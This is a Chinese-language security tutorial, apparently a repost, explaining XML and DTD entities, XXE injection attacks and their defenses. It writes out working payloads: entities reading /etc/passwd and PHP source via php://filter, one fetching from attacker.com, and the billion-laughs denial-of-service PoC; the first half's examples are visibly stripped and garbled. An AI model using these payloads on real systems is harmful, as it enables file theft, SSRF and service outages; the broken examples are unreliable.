在研究XXE注入攻击之前先了解一下什么是XXE

 

定义

XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。

文档结构

XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。

     
      
     
       
     
          
     
        
     
        
     
        
     ]]]>
     
     
      
       Dave
      
      
       Tom
      ReminderYou are a good man
     

DTD

XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。

内部声明DTD:

引用外部DTD:

DTD中的一些重要的关键字：

• DOCTYPE（DTD的声明）
• ENTITY（实体的声明）
• SYSTEM、PUBLIC（外部资源申请）

实体类别介绍

实体主要分为一下四类

• 内置实体 (Built-in entities)
• 字符实体 (Character entities)
• 通用实体 (General entities)
• 参数实体 (Parameter entities)

参数实体用%实体名称申明，引用时也用%实体名称;

其余实体直接用实体名称申明，引用时用&实体名称。

参数实体只能在DTD中申明，DTD中引用；

其余实体只能在DTD中申明，可在xml文档中引用。

举例：

内部实体

外部实体

参数实体

     或者
     

注意：参数实体是在DTD中被引用的，而其余实体是在xml文档中被引用的。

外部实体

默认协议

PHP扩展协议

举例：

     ]>
             
      
       &passwd;
      
     

0x02 XXE漏洞

XXE就是XML外部实体注入。当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

举例

1. 恶意引入外部实体(1)

     ]>        
      
       &passwd;
      

2. 恶意引入外部实体(2)

**XML内容**
                     %d;]>
     
      &b;
     

DTD文件内容

3. 恶意引入外部实体(3)

XML文件内容

     ]>&b;

DTD文件内容

XXE的危害

1. 读取任意文件
   - 有回显
   XML.php

     ]>
     
      &f;
     EOF;$data = simplexml_load_string($xml);print_r($data);?>

访问XML.php可以读取etc/passwd文件内容

- 无回显

当页面没有回显的话，可以将文件内容发送到远程服务器，然后读取。

                      %f;]>&b;$data = simplexml_load_string($xml);print_r($data);

远程服务器的evil.dtd文件内容

2. 命令执行

php环境下，xml命令执行要求php装有expect扩展。而该扩展默认没有安装。

     ]>
     
      &f;
     EOF;$data = simplexml_load_string($xml);print_r($data);?>

3. 内网探测/SSRF

由于xml实体注入攻击可以利用http://协议，也就是可以发起http请求。可以利用该请求去探查内网，进行SSRF攻击。

0x03 XXE漏洞修复与防御

1，使用开发语言提供的禁用外部实体的方法

PHP

libxml_disable_entity_loader(true);

JAVA

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);

Python

from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

2，过滤用户提交的XML数据

过滤关键词：<!DOCTYPE和<!ENTITY，或者SYSTEM和PUBLIC。

 

 

 

 

 

下面是XXE注入攻击与防御

 

0x00 前言

XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题.

在XML1.0标准⾥里,XML文档结构⾥里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导致信息泄漏等安全问题.

0x01 威胁

XXE漏洞目前还未受到广泛关注,Wooyun上几个XXE引起的安全问题:

• pull-in任意文件遍历/下载

• 从开源中国的某XXE漏洞到主站shell

• 百度某功能XML实体注入

• 百度某功能XML实体注入（二）

借助XXE,攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等.

对于不同XML解析器,对外部实体有不同处理规则,在PHP中默认处理的函数为: xml_parse和simplexml_load xml_parse的实现方式为expat库，默认情况不会解析外部实体,而simplexml_load默认情况下会解析外部实体,造成安全威胁.除PHP外，在Java，Python等处理xml的组件及函数中都可能存在此问题

0x02 语法

要写Payload,首先要对XML实体语法有一定了解

XML中entity的定义语法为:

Default

<!DOCTYPE filename [ <!ENTITY entity-name "entity-content" ]>

1 2 3 4

<!DOCTYPE filename [ <!ENTITY entity-name "entity-content" ]>

如果要引用一个外部资源,可以借助各种协议 几个例子:

Default

file:///path/to/file.ext http://url/file.ext php://filter/read=convert.base64-encode/resource=conf.php

1 2 3

file:///path/to/file.ext http://url/file.ext php://filter/read=convert.base64-encode/resource=conf.php

故构造几种简单的Payload模型如下:

Default

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall>

1 2 3 4 5 6 7

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall>

亦可读取网站内容

Default

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "http://attacker.com/text.txt" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall>

1 2 3 4 5 6 7

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "http://attacker.com/text.txt" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall>

如果包含文件失败,可能是由于读取php等文件时文件本身包含的<等字符.可以使用Base64编码绕过,如:

Default

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall>

1 2 3 4 5 6 7

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall>

0x03 攻击

借助XXE,有几种可用且公开的攻击方式:

拒绝服务

POC

Default

<?xml version = "1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]> <lolz>&lol9;</lolz>

1 2 3 4 5 6 7 8 9 10 11 12 13 14

<?xml version = "1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]> <lolz>&lol9;</lolz>

POC中中先定义了lol实体，值为”lol”的字符串,后在下面又定义了lol2实体，lol2实体引用10个lol实体，lol3又引用了10个lol2实体的值，依此类推，到了最后在lolz元素中引用的lol9中，就会存在上亿个”lol”字符串此时解析数据时未做特别处理，即可能造成拒绝服务攻击。

此外还有一种可能造成拒绝服务的Payload,借助读取/dev/random实现.

内网信息

借助各种协议如http,XXE可以协助扫描内网,可能可以访问到内网开放WEB服务的Server,并获取其他信息

 

文件读取

最常规也是最有效的利用思路

Default

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall>

1 2 3 4 5 6 7

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xdsec [ <!ELEMENT methodname ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodcall> <methodname>&xxe;</methodname> </methodcall>

附上两张截图,实现文件读取的过程

0x04 防御

1.检查所使用的底层xml解析库，默认禁止外部实体的解析

2.使用第三方应用代码及时升级补丁

3.同时增强对系统的监控，防止此问题被人利用

对于PHP,由于simplexml_load_string函数的XML解析问题出在libxml库上,所以加载实体前可以调用这样一个函数

Default

<?php libxml_disable_entity_loader(true); ?> 以进行防护,对于XMLReader和DOM方式解析,可以参考如下代码: <?php // with the XMLReader functionality: $doc = XMLReader::xml($badXml,'UTF-8',LIBXML_NONET); // with the DOM functionality: $dom = new DOMDocument(); $dom->loadXML($badXml,LIBXML_DTDLOAD|LIBXML_DTDATTR); ?>>

1 2 3 4 5 6 7 8 9 10 11

<?php libxml_disable_entity_loader(true); ?> 以进行防护 ,对于XMLReader和DOM方式解析,可以参考如下代码: <?php // with the XMLReader functionality: $doc = XMLReader::xml($badXml,'UTF-8',LIBXML_NONET); // with the DOM functionality: $dom = new DOMDocument(); $dom->loadXML($badXml,LIBXML_DTDLOAD|LIBXML_DTDATTR); ?>>

0x05 参考

 

 

 

转载--http://www.91ri.org/9539.html

http://www.jianshu.com/p/7325b2ef8fc9

任重而道远！